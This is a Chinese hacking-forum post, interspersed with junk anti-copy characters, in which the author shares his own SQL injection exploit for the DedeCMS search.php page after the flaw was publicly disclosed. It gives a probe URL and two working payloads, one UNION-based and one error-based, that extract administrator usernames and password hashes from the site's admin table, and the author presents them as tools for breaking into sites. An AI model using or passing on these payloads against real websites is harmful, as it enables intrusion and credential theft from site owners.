转载不加作者名的没JJ$ x: I' ~8 U6 c6 b
6 k' W# |7 G0 j) g哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。* E/ J& \0 B2 \9 f
# ^. |: Q1 X7 u* T# S5 {7 I既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
5 [& y; L# p6 x/ `1 q" a
( \7 m% l$ G! i' h& ]8 a我一般是这样测试的:
. M# K2 \/ V; {$ a: I. I L6 s$ [% R3 ~, _* \
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a! m9 |' F( C' s3 P% O$ z
' ?, Z+ t5 V# c ~2 e4 F' l& f
转载不加作者名的没JJ
, S2 x+ y+ X) G, |9 R8 S6 Q, n# n& _; z7 W$ m, X, A/ E& T1 F2 a& C& h
作者:鬼哥
- C: |" ^# M d6 o. T- d M& A/ u
2 s g# t/ t$ e: ?3 c3 `
9 L9 O! f! {6 l
- g4 a3 T! W9 D- P" B# o看结果如果提示
C) Q) ~: ], s% @# Q& G" |* U7 {) X0 v) l- U, h1 Z
Safe Alert: Request Error step 2 !7 H! C1 W2 J5 p* F3 g
8 L; n* ]' }: ~9 h% y5 P. P那么直接用下面的exp. T; t! V: ~4 B. L* k& k
$ W, d0 c! p# e- J$ x$ v$ ]4 Y
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
, M) k$ S$ {5 E: f$ y. X- \1 U( _. j2 M! N2 y) x
" W/ ?$ h$ C+ H& w' a# }. a' |
看结果如果提示7 B' R, O& `4 v
% O& n6 u9 }8 j& M% h5 l, G7 d- JSafe Alert: Request Error step 1 !7 t7 {) {5 U" S/ _$ S; }. ^* R$ j
8 P& c9 S' F4 j, P
那么直接用下面的exp+ D& t3 N: c! M8 @& a
$ w6 O% l, W% x* Oxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a! F3 }1 i2 v+ q& {3 o8 s6 y! i/ {: I* M
/ t* }8 q$ L3 x9 M' K9 q
6 d p/ Q9 t) \3 V+ M3 D6 b# _7 N- [如果正常显示证明漏洞不存在了。* L) V+ P, ?1 D" |! A: s% p5 a4 s
& q+ C& ^( @( d" g# a% R& `$ y8 k转载不加作者名的没JJ |